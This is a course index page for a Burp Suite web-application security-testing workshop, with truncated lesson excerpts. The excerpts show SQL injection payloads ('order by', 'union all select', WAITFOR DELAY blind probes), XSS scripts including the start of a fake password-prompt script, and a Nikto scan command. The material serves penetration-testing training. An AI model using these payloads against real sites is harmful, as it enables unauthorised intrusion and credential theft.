Burp Suite Workshop

Or log in to access your purchased courses

Web App Security Testing & Burp Suite Fundamentals 

Manual Web App Security Testing Fundamentals
Understanding how to use Burp Suite to perform a web app test
Integrating Burp with Skipfish
Integrating Burp with SQLMap

Day 2: Integrating Burp Suite with other tools and writing your own plugins 

Using Burp to mask Nikto headers
Running w3af plugins through Burp
Integrating Burp with SoapUI
Burp Suite Automation

Course By

Joseph McCray


C1L1: Course Materials

Author: Joseph McCray

Introduction: Welcome to the introductory tutorial to Burp Suite. It gives details about the installation and usage of Burp Suite, which is an essential tool for bug hunters and web application pentesters. Learning Objectives: Learn how to install Burp Suite Understand how to use a Proxy connection to analyze web applications Understand  how to use Burp Suite [...]

C1L2: Getting started with VMWare

Author: Joseph McCray

For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player. A 30-day trial of Workstation 11 can be downloaded from here:  https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/11_0   A 30-day trial of Fusion 7 can be downloaded from here: https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_fusion/7_0   The newest version of VMWare Player can be downloaded from here: https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/7_0   [...]

C1L3: Basic: Web Application Testing

Author: Joseph McCray

WEB APPLICATION TESTING Most people are going to tell you to reference the OWASP Testing guide. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website. The key to doing a [...]

C1L4: SQL Injection

Author: Joseph McCray

Basic XSS Cross-Site Scripting (XSS) is a type of injection script that can be directed to the perforation of security standard on a trusted website, it is often used to send a malicious script and the attacks are directed to web applications generated on the form of a browser side script. This injection attack takes [...]

C1L5: Union-Based SQL Injection

Author: Joseph McCray order by 100-- order by 50-- order by 25-- order by 10-- order by 5-- order by 6-- order by 7-- order by 8-- order by 9-- union all select 1,2,3,4,5,6,7,8,9-- We are using a union select statement because we are joining the developer's query [...]

C1L6: Blind SQL Injection Testing

Author: Joseph McCray

BLIND SQL INJECTION TESTING Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER 3 - Total Characters; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds) Let's go for a quick check to see if [...]

C2L1: What is XSS

Author: Joseph McCray

WHAT IS XSS   https://s3.amazonaws.com/infosecaddicts-files/2-Intro_To_XSS.pptx OK - what is Cross Site Scripting (XSS) 1. Use Firefox to browse to the following location: A really simple search page that is vulnerable should come up. 2. In the search box type: <script>alert('So this is XSS')</script> This should pop-up an alert window with your message in it [...]

C2L2: A Better Way To Demo XSS

Author: Joseph McCray

XSS DEMO   Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box. Use Firefox to browse to the following location: Paste this into the search box Option 1 <script> password=prompt('Your session is expired. Please enter your password to [...]

C3L1: Setting up Burp Suite

Author: Joseph McCray

Download latest free version of Burp at http://www.portswigger.net/burp/download.html Make sure that burpsuite_free_v1.6.31.jar is set as executable (chmod +x burpsuite_free_v1.6.31.jar) and then run: Installing JAVA In Ubuntu open the terminal then run: sudo add-apt-repository ppa:webupd8team/java sudo apt-get update sudo apt-get install oracle-java8-installer Click the "Proxy" tab Click the "Options" sub-tab Click “Edit” in the “Proxy Listeners” section In [...]

C3L2: Web Services

Author: Joseph McCray

WEB SERVICES   http://data.serviceplatform.org/wsdl_grabbing/seekda-wsdls.with_ini/36-CurrencyConvertor.wsdl Question 1: What is the process that you use when you test? Step 1: Automated Testing Step 1a: Web Application vulnerability scanners - Run two (2) unauthenticated vulnerability scans against the target - Run two (2) authenticated vulnerability scans against the target with low-level user credentials - Run two (2) authenticated [...]

C3L3: How much fuzzing is enough?

Author: Joseph McCray

There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do. Step 1: Ask yourself the 3 questions per page of [...]

C4L1: Nikto with Burp in Linux

Author: Joseph McCray

NIKTO WITH BURP cd ~/toolz/ rm -rf nikto* git clone https://github.com/sullo/nikto.git Nikto2 cd Nikto2/program perl nikto -h http://zero.webappsecurity.com -useproxy http://localhost:8080/   Masking the Nikto header reference: http://carnal0wnage.attackresearch.com/2009/09/btod-nikto-thru-burp-masking-nikto.html